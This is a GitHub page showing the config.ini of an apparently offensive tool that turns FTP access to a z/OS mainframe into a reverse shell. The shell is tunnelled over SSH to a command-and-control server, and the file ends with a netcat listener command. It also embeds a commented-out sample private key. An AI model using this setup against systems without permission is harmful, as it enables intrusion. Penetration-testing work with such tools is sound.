-
Notifications
You must be signed in to change notification settings - Fork 0
/
config.ini
107 lines (91 loc) · 4.97 KB
/
config.ini
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
[ZOS]
; This is the codepage (character set) in use on the target mainframe
codepage = cp037
; Target mainframe hostname or IP address
hostname = target.mainframe.net
; Mainframe FTP user login name
username = zuser
; If you really, REALLY, want an hardcoded password, uncomment the next line
;password = donotinputapasswordhere
; User for the reverse ssh connection
; Must be a valid ssh user on the cc_server
cc_user = ccserveraccount
; IP address/hostname of the CC server.
; It needs to be resolvable and reachable from the mainframe
cc_server = my.public.hostname.net
; SSH listening port on the cc_server
cc_port = 22
; SSH key length, shorter key means more compatibility and shorter setup times
; ... and less security
keybits = 4096
; Temporary path on the mainframe to store runfiles:
; - ssh private key
; - ssh cc_server fingerprint
; - FIFO file for the shell I/O
; Try to store these in the user home directory on the mainframe.
; Layered security b***h!
temporary_path = /tmp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;; YOU PROBABLY ARE GOOD TO GO HERE :) ;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;; Advanced and edge-case settings below ;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Hostname of the shell collector (EBCDIC)
; This should be localhost if ftp2shell.py runs directly on cc_server
ebcdiccat_host = 127.0.0.1
; Port for the EBCDIC reverse-shell
ebcdiccat_port = 3456
; This is useful if you are behind NAT and the script cannot autodetect the CC
; server ssh fingerprint
; You can get the value by running ssh-keyscan by yourself
; FORMAT:
; cc_server_fingerprint = [cc_server_ip_address] ecdsa-sha2-nistp256 [fingerprint]
; You can also use a static SSH key instead of generating one at each runtime
;
; The same considerations for the password apply for the private ssh key
; this is the key to YOUR system so it's not a threat against the systems
; you are getting a shell on. A little better than hardcoded passwords :)
;
; DO NOT USE THIS KEY!
;
; Remember that you must indent multiline values
;key =
; -----BEGIN RSA PRIVATE KEY-----
; MIIEowIBAAKCAQEAx+/NwlpFnjuCZGpG+hmZKYzzKYDaChK5DJaOrN8y7O16HkFD
; y+5lAAY6WQueq//H8r2Ils4R87SPqyz0lfFOLZCR7CSGV6F1sQZEWbLAIUhBl5F0
; TugyyCJcjOVoiLwonVqlp6SfwTUXKNf5ZIGC3VAGLpSx6GVtbGyMjMDbi0odtdMt
; T+yT2AJFBXpm95BxVh4Nb7lH4U6BWD6Vxp8BjXkbwe5NOaTsQPJOdop8J1T3kCe2
; ve+6r0q0lt3xJuGvsWvHGoT0OKOmYteck4cZ2e1/YEWTToZ7uNOH6IG7zWIqnNwn
; nPC/hWlGn7qis3nBwCV+bnrerLbe7gjVQFmVnwIDAQABAoIBAEeRRELUk2T/gj41
; eLCfpx6jcIsjr2i5qPmjjvC8eHssynC4Be+ipw6qLAqhyStiRI1UYOcyXmSw9lhc
; oDRoCwbuX/16WYhWqE00pBTDkliXh7scetif70WKXzykBZYkXBlvUCrBF9pOCbs6
; C/B5F4Hm2j+kREaev9t2w5zCkBO8UwsvmjDKQt5Fsg2+ICquW2E0J4s+57p/DqFy
; RnOojtAmfz0sdWH1KRp5xPUNV2Iu8Io5mzuXr1XMEvjpGheCctTo47J9kmh1aBoU
; Or6+/nevGcwUvN8Tm/cCzVv2n5jG0N3bs+kEX0aaOWweFL9FNt/lmIuUHFuj6wk1
; UfpCXmECgYEA5DS5glxWmYkuyQoNTfoJbum0qd5TDhMb9rZoMUhG73fNGWGg8MMU
; woSE8ZhLj0R/phnbAkuaiEGWgToSGMpGkThlW8KDJ1C17NKedv4GZMIGlWnaUBlG
; M+iVqmRKb3FSKMvbNP2y8NHne/rY08qJvIGucAtjCyYdq3gZ+1LPQw8CgYEA4Emq
; 9zc9SI6HLfDh8L8fg19J8QCmIW7gsfpL5rFyqN413VebrNzwk1/g24tROJpvaG5z
; q0GIRN2b1c72svquRya2xannUQZxQoiipDFhyh1aJXTWFkhamfUH4FhseDPKUqDR
; b8KxjgWsgOG28d7HP8zTkaG2sYOEn49gn+YjRHECgYA+3LtBSrhcQOrPXGJ/2WGh
; 2OT4ahLM7LymQGcBNFy9+G1aEYeo6sQcNS798irWQ1M6aSLoRfVClXalEF8NzyKT
; PErHdRR1zwjePMKEGsOeG8h+fhMyP1QUVnxr3IaYnkm4jTdMKJqTNe8jOt1hsggx
; EjQAD1LwLka8BjB6B7yqRwKBgQDUlH46ulyXfJ+bZ4h+ymdv+Mz4ZAkR/ylxBy8R
; hHaMn7CmDfc7LF3JEULqU220HIwjiyyO0Rn7S5/8UqF4mii8v3DUgGkCXvzSdvbQ
; cQ2ip5ddkROpIwLckWXZuXV1qIDHOC3Jo9ruJWqO7WCcdu6bBeQxT/j83w7AvQB0
; DYi3wQKBgHRWEaxLk/OYWVD0dWcV+tRBFkETgbS56aWIEVhQ1vy0TzavEsg8kKl6
; Nv4PsHfaXmRdpzUbQZpV8v1ukmphGetLQRj9hlBhLm5p9Lp77mbg6BtWgRoBoCtx
; J6+HdNQs6GzUvtOktnokCPDgNeksIynvPU8Vttbr/RKiMeRrBXHw
; -----END RSA PRIVATE KEY-----
; If you choose to hardcode the private key, you have to harcode the public one too.
; Save it into ~cc_user/.ssh/authorized_keys on cc_server
;authorized_key = ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDH783CWkWeO4Jkakb6GZkpjPMpgNoKErkMlo6s3zLs7XoeQUPL7mUABjpZC56r/8fyvYiWzhHztI+rLPSV8U4tkJHsJIZXoXWxBkRZssAhSEGXkXRO6DLIIlyM5WiIvCidWqWnpJ/BNRco1/lkgYLdUAYulLHoZW1sbIyMwNuLSh210y1P7JPYAkUFemb3kHFWHg1vuUfhToFYPpXGnwGNeRvB7k05pOxA8k52inwnVPeQJ7a977qvSrSW3fEm4a+xa8cahPQ4o6Zi15yThxnZ7X9gRZNOhnu404fogbvNYiqc3Cec8L+FaUafuqKzecHAJX5uet6stt7uCNVAWZWf
; Command used to get the local (after ssh) reverse connection
; You probably won't need to change this unless you want to run another
; netcat version (For example, BSD and nmap ncat work too)
; BSD netcat syntax:
;shell_command = nc -l ${ebcdiccat_port}
; GNU netcat:
shell_command = nc -l ${ebcdiccat_host} -p ${ebcdiccat_port}